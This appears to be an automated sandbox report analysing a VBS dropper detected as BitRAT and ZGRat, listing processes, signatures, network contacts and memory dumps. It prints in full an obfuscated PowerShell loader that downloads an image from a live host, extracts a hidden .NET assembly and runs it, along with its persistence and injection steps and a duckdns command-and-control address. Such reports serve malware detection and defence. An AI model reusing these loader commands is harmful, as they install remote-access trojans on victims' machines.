reYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTrecDgTreBoDgTreHDgTreDgTreLgBiDgTreHYDgTreLwBnDgTreG4DgTreLgBtDgTreG8DgTreYwDgTreuDgTreGQDgTrebDgTreByDgTreG8DgTredwBlDgTreHIDgTreYQBsDgTreGMDgTreZQBkDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFYDgTreYgBzDgTreE4DgTreYQBtDgTreGUDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFcDgTreaQBuDgTreGQDgTrebwB3DgTreHMDgTreXDgTreBUDgTreGUDgTrebQBwDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreDgTre=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\VbsName.vbs -Force }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('php.bv/gn.moc.dlroweralced//:sptth' , '' , '2' , 'VbsName' , '1' , 'C:\Windows\Temp\', 'LnkName'))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 188.114.96.0:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 declareworld.com.ng udp
US 131.153.147.162:443 declareworld.com.ng tcp
US 8.8.8.8:53 162.147.153.131.in-addr.arpa udp
US 8.8.8.8:53 bit9090.duckdns.org udp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp
US 8.8.8.8:53 bit9090.duckdns.org udp
RU 194.147.140.172:9090 bit9090.duckdns.org tcp

Files

memory/2160-8-0x0000027BA0630000-0x0000027BA0652000-memory.dmp

memory/2864-9-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/2864-10-0x00000248652D0000-0x00000248652E0000-memory.dmp

memory/2160-11-0x0000027B88330000-0x0000027B88340000-memory.dmp

memory/2160-12-0x0000027B88330000-0x0000027B88340000-memory.dmp

memory/2864-13-0x00000248652D0000-0x00000248652E0000-memory.dmp

memory/2160-14-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/2864-19-0x000002487F320000-0x000002487F396000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qf2fkl0s.tad.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4816-46-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/4816-49-0x000001FAC1370000-0x000001FAC1380000-memory.dmp

memory/4816-50-0x000001FAC1370000-0x000001FAC1380000-memory.dmp

memory/2160-55-0x0000027B88330000-0x0000027B88340000-memory.dmp

memory/2160-60-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/4816-75-0x000001FAC1370000-0x000001FAC1380000-memory.dmp

memory/2864-76-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/2864-77-0x00000248652D0000-0x00000248652E0000-memory.dmp

memory/2864-78-0x00000248652D0000-0x00000248652E0000-memory.dmp

memory/4816-79-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/4816-80-0x000001FAC1370000-0x000001FAC1380000-memory.dmp

memory/4816-81-0x000001FAC1370000-0x000001FAC1380000-memory.dmp

memory/4816-82-0x000001FADA230000-0x000001FADA552000-memory.dmp

memory/4816-83-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-84-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-86-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-88-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-90-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-92-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-94-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-96-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-98-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-100-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-102-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-104-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-106-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-108-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-110-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-112-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-114-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-116-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-118-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-120-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-122-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-124-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-126-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-128-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-130-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-132-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-134-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-136-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-138-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-140-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-142-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-144-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-146-0x000001FADA230000-0x000001FADA54C000-memory.dmp

memory/4816-10553-0x000001FAC17D0000-0x000001FAC17D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 add939851f49809eccda0486343b7e9d
SHA1 da732fcd707f5cbf3df918aa1d25b36fb712c126
SHA256 4817b37dd7e9a504d2aece0fcd4f7a719a98cdbb3da4316ad6e020bfa56bc286
SHA512 80ea7f5c27a55ecf8224172c61d5937fc1f195b6c0fd2d1c83191c8a99c874ecd2cee919a79225f73a7166f5d59cd03ffff904f4bf365d6ac5b6c6b8d028b042

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f6c90ab0db80c6c3ea92556fda7273c7
SHA1 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256 a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512 aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

memory/4816-10566-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/1528-10567-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/2864-10569-0x00000248652D0000-0x00000248652E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8f458397d13e573d022dac941000df9b
SHA1 6f32ae5ae3bbc7c6acfc18c24d925fef50109c84
SHA256 fb25a77d6be0912fa6817ec2e711e2f6ef662dcad42e8c2d7139cdc89fd1329f
SHA512 3bf11b32743b0467859d6ac692b044e71a4eafd503feffc2edfc79ac64b7d8a33d38c64df03ca3b618194c1a4aee6f41e2244a1fb778615da5b26fc5bca1a65b

memory/2864-10573-0x00007FFD2C2B0000-0x00007FFD2CC9C000-memory.dmp

memory/1528-10575-0x0000000073350000-0x000000007338A000-memory.dmp

memory/1528-10583-0x0000000073320000-0x000000007335A000-memory.dmp

memory/1528-10586-0x00000000732F0000-0x000000007332A000-memory.dmp

memory/1528-10587-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1528-10590-0x00000000732F0000-0x000000007332A000-memory.dmp

memory/1528-10593-0x00000000732F0000-0x000000007332A000-memory.dmp

memory/1528-10596-0x00000000732F0000-0x000000007332A000-memory.dmp

memory/1528-10599-0x00000000732F0000-0x000000007332A000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-10-13 13:04

Reported

2023-10-13 13:15

Platform

win10v2004-20230915-en

Max time kernel

301s

Max time network

321s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

Signatures

BitRAT

trojan bitrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LnkName.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1688 set thread context of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4292 wrote to memory of 1196 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1196 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4292 wrote to memory of 1824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1196 wrote to memory of 1688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1196 wrote to memory of 1688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1688 wrote to memory of 3324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTrecDgTreBoDgTreHDgTreDgTreLgBiDgTreHYDgTreLwBnDgTreG4DgTreLgBtDgTreG8DgTreYwDgTreuDgTreGQDgTrebDgTreByDgTreG8DgTredwBlDgTreHIDgTreYQBsDgTreGMDgTreZQBkDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFYDgTreYgBzDgTreE4DgTreYQBtDgTreGUDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFcDgTreaQBuDgTreGQDgTrebwB3DgTreHMDgTreXDgTreBUDgTreGUDgTrebQBwDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreDgTre=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\VbsName.vbs -Force }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('php.bv/gn.moc.dlroweralced//:sptth' , '' , '2' , 'VbsName' , '1' , 'C:\Windows\Temp\', 'LnkName'))"

